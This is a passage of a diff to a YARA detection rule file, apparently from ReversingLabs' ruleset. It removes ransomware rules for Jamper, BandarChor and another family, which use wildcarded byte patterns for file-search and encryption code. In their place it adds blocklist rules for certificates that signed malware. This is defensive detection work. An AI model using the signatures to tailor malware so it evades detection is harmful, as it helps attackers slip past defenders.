-            ?? ?? ?? 74 ?? 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85
-            ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B 8D ?? ?? ??
-            ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 7B ?? 49 8B E3
-            5D C3
-        }
-		$encrypt_files_p1 = {
-            FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 63 C8 48 8D 85 ?? ?? ??
-            ?? 48 8D 04 48 48 83 C0 ?? 66 83 38 ?? 75 ?? 45 33 FF 4C 8D 05 ?? ?? ?? ?? 66 44 89
-            38 45 33 C9 48 83 C0 ?? 4C 89 7C 24 ?? 48 89 05 ?? ?? ?? ?? 33 D2 48 8D 05 ?? ?? ??
-            ?? 44 89 7C 24 ?? 33 C9 48 89 05 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 D2 45 8D 47 ?? 33
-            C9 FF 15 ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 48 8B 1D ?? ?? ?? ?? 48 81 C3 ?? ?? ??
-            ?? EB ?? 48 8B CB FF 15 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D3 48 8B CE 44 8B F0 FF
-            15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B C8
-            FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 41 8D 46 ?? 48 63 C8 48 8D 1C 4B 66 44
-            39 3B 75 ?? 48 8B CE FF 15 ?? ?? ?? ?? 33 D2 8D 4A ?? FF 15 ?? ?? ?? ?? 48 8B F8 48
-            83 F8 ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 48 8B 1D ?? ?? ?? ?? 48 81
-            C3 ?? ?? ?? ?? EB ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B D3 48 8D 4C 24 ?? 44 8B F0 FF
-            15 ?? ?? ?? ?? 85 C0 75 ?? 44 8B 44 24 ?? 8D 48 ?? 33 D2 FF 15 ?? ?? ?? ?? 48 8B F0
-            48 83 F8 ?? 74 ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 41 8D
-            46 ?? 48 63 C8 48 8D 1C 4B 66 44 39 3B 75 ?? 48 8D 54 24 ?? 48 8B CF FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? 48 8B CF FF 15 ?? ?? ?? ?? 33 D2 48 8D 8D ?? ?? ?? ?? 41 B8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 48 8D 35 ?? ?? ?? ?? 48
-        }
-		$encrypt_files_p2 = {
-            8D 8D ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 44 8D 42 ?? E8 ?? ?? ?? ?? 4C 8B 05 ?? ?? ??
-            ?? 48 8D 8D ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 4C 89 BD
-            ?? ?? ?? ?? 44 8B CB C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 48 8D 8D ?? ?? ?? ?? 33 D2 FF
-            15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 48 8D 44 24 ?? 45
-            33 C9 45 33 C0 48 89 44 24 ?? 8D 53 ?? 33 C9 FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
-            48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ??
-            ?? 3D ?? ?? ?? ?? 75 ?? 44 8B CB C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 48 8D 8D ?? ?? ??
-            ?? 33 D2 FF 15 ?? ?? ?? ?? 48 8B BD ?? ?? ?? ?? 48 85 FF 0F 84 ?? ?? ?? ?? 48 8B 0D
-            ?? ?? ?? ?? 41 8B DF 48 81 C1 ?? ?? ?? ?? 45 8B F7 FF 15 ?? ?? ?? ?? 85 C0 7E ?? 49
-            8B F7 48 8B 05 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 0F BE 8C 06 ?? ?? ??
-            ?? 44 0F BE 8C 06 ?? ?? ?? ?? 89 4C 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2
-            48 8D 8D ?? ?? ?? ?? 44 8D 42 ?? E8 ?? ?? ?? ?? 8B CB 48 8D 76 ?? FF C3 41 83 C6 ??
-            88 84 0D ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 81 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 44
-        }
-		$encrypt_files_p3 = {
-            3B F0 7C ?? 48 8D 35 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 C9 48 89 44 24 ?? 48 8D
-            95 ?? ?? ?? ?? 44 8B C3 44 89 7C 24 ?? 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
-            ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 4C 8B C3 E8 ??
-            ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 C9 C7 44 24 ?? ?? ?? ?? ??
-            48 89 44 24 ?? 33 D2 48 8D 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 48 89 44 24 ?? 45 8D 41
-            ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 41 8B DF 44 39 BD ?? ?? ?? ?? 76 ?? 8B C3 4C 8D 05
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 44 0F B6 8C 05 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF C3 3B 9D ?? ??
-            ?? ?? 72 ?? 48 8B 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 D2 48 8B CF FF 15 ?? ?? ?? ??
-            48 8B 05 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 48 83 C0 ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 48 89 44 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 06 00 48
-            8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 66 44 89 BD ?? ?? 00 00 F3 0F 7F 85 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8D 8D ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 48 8B 8D ?? ?? ?? ??
-            48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ?? 49 8B 7B ??
-            49 8B E3 41 5F 41 5E 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $search_files and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Divisible Limited" and pe.signatures [ i ] . serial == "6e:3b:09:f4:3c:3a:0f:d5:3b:7d:60:0f:08:fa:e2:b5" and 1507248000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Jamper : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_21220646C639D62C16992F46 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Jamper ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9ba9358e-8f67-5d0e-a9bc-b3b10cd3a8b2"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "b80b1832-6bfa-555b-8462-cd17f9e5e0e1"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Jamper.yara#L1-L110"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "826f8fa7cc92b279c609a9ab6a87c32940e37b4c2476854af75bbed29cb3eaf2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16600-L16616"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "87202c29867e6410d59c1e3b5ab09a24ebac5c68c61d7b932b91a91dcf3707e2"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Jamper"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D
-            ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ??
-            89 45 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 DB 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 8B
-            45 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            8B 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 6A ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 12 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 83
-            BD ?? ?? ?? ?? ?? 75 ?? 83 BD ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? EB ?? 0F 8E ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 76 ?? EB ?? 7E ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8
-            ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 83 FB ?? 7F ?? B8
-        }
-		$encrypt_files_p2 = {
-            E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8
-            ?? ?? ?? ?? 43 83 FB ?? 75 ?? 8B 85 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8D 45
-            ?? E8 ?? ?? ?? ?? 8B D0 8B 8D ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? 83 BD ?? ?? ?? ??
-            ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 45 ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? EB ?? 8D 45 ??
-            E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 33 D2 8B 45 ?? 8B 08 FF 51 ?? 83
-            BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? E8 ?? ?? ?? ??
-            8B D0 B9 ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9
-            ?? ?? ?? ?? 8B 45 ?? 8B 18 FF 53 ?? 55 E8 ?? ?? ?? ?? 59 55 E8 ?? ?? ?? ?? 59 EB ??
-            55 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? 8B
-            18 FF 53 ?? 55 E8 ?? ?? ?? ?? 59 B3 ?? 8D 45 ?? E8 ?? ?? ?? ?? 84 DB 74 ?? 8D 95 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B
-            F8 57 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ?? 33 C0 5A 59 59
-            64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$find_files = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 89 55 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ??
-            ?? 89 C3 85 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 FF D3 85 C0 74
-            ?? 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45
-            ?? 80 38 ?? 75 ?? 8B 45 ?? 80 78 ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? E8 ?? ??
-            ?? ?? 8B F0 80 3E ?? 0F 84 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F0 80 3E ?? 0F 84
-            ?? ?? ?? ?? EB ?? 8B 75 ?? 83 C6 ?? 8B DE 2B 5D ?? 8D 43 ?? 50 8B 45 ?? 50 8D 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 8B F8 8B C7 2B C6
-            03 C3 40 3D ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 8B C7 2B C6 40 50 56 8D 85 ?? ?? ?? ?? 03
-            C3 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 89 45
-            ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            8D 53 ?? 03 C2 40 3D ?? ?? ?? ?? 7F ?? C6 84 1D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C3
-            48 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 03 C3 40 50 E8 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 40 03 D8 8B F7 80 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 8D 85
-            ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$enum_resources = {
-            55 8B EC 83 C4 ?? 53 56 57 33 D2 89 55 ?? 89 55 ?? 89 55 ?? 33 D2 55 68 ?? ?? ?? ??
-            64 FF 32 64 89 22 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8D 55 ?? 52 50 6A ?? 6A
-            ?? 6A ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 33 C0 5A 59 59 64 89 10 E9 ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 89
-            45 ?? 8D 45 ?? 50 8B 45 ?? 50 8D 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D
-            ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 48 85 C0 0F 82 ?? ?? ?? ?? 40 89 45 ?? 8B 45 ?? 8B
-            58 ?? 85 DB 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? 8B
-            D3 E8 ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B6 12 88 50 ?? C6 00 ?? 8D 55 ?? 8D 45 ?? E8
-            ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B6 52 ?? 88 50 ?? C6 00 ?? 8D 55 ?? 8D 45 ?? B1 ??
-            E8 ?? ?? ?? ?? 8D 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 55 ?? B8 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 55 ?? 58 E8 ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? 8B 40 ?? 8B 55 ?? 8B
-            08 FF 51 ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? F7
-            40 ?? ?? ?? ?? ?? 76 ?? 8B 45 ?? E8 ?? ?? ?? ?? 83 45 ?? ?? FF 4D ?? 0F 85 ?? ?? ??
-            ?? EB ?? 81 7D ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 E8
-            ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 33 C0
-            5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
-            ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sivi Technology Limited" and pe.signatures [ i ] . serial == "21:22:06:46:c6:39:d6:2c:16:99:2f:46" and 1466130984 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Bandarchor : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_738663F2C9E4Adb3Ad5306Aa5E7Cc548 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BandarChor ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c645a081-7ff6-58fc-af8e-55f43f56d0ea"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "9fa41321-9736-5e67-b561-005b6d893e3f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.BandarChor.yara#L1-L97"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1c0c33ef7de089fc7ed6b364c7693499d1a93f79a48d6f2a5c375e47aea176bc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16618-L16634"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "518a22e31432ee42e6aceb861815f7f9e84f2430b7fb3a78b498e45c584584ab"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BandarChor"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$file_extensions_1 = {
-            55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 F9 51 53 89 55 ?? 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? 8B 95 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 85 F9 00 00 00 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B C3 E8 4F FE FF FF E9 ?? ?? ?? ?? 8D 95
-        }
-		$file_extensions_2 = {
-            ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ??
-            ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8
-        }
-		$file_extensions_3 = {
-            8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ??
-            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
